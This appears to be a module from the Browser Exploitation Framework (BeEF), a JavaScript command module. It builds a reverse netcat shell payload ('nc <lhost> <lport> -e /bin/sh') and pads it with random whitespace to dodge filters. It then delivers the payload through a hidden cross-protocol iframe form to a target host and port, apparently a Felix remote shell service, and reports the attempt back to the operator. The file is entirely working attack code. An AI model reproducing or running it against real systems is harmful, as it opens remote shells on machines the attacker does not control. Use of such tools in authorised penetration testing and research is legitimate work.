52 lines
1.4 KiB
JavaScript
52 lines
1.4 KiB
JavaScript
//
|
|
// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
var rhost = '<%= @rhost %>';
|
|
var rport = '<%= @rport %>';
|
|
var lhost = '<%= @lhost %>';
|
|
var lport = '<%= @lport %>';
|
|
var payload_name = 'reverse_netcat';
|
|
var timeout = 15;
|
|
var peer = rhost + ':' + rport;
|
|
|
|
cleanup = function() {
|
|
try {
|
|
document.body.removeChild(felix_exec_iframe_<%= @command_id %>);
|
|
} catch(e) {
|
|
beef.debug("Could not remove iframe: " + e.message);
|
|
}
|
|
}
|
|
setTimeout("cleanup()", timeout*1000);
|
|
|
|
payload = function() {
|
|
var whitespace = '';
|
|
for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
|
|
var payload = '';
|
|
switch (payload_name) {
|
|
default: // "reverse_netcat":
|
|
payload = 'exec "/bin/nc ' + lhost + ' ' + lport + ' -e /bin/sh" ';
|
|
payload = payload.replace(/ /g, whitespace);
|
|
break;
|
|
}
|
|
return payload
|
|
}
|
|
|
|
exploit = function() {
|
|
var code = payload();
|
|
beef.debug(peer + " - Sending payload (" + code.length + " bytes)");
|
|
var felix_exec_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);
|
|
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
|
}
|
|
|
|
try {
|
|
exploit();
|
|
} catch(e) {
|
|
beef.debug(peer + " - Exploit failed: " + e.message);
|
|
}
|
|
|
|
});
|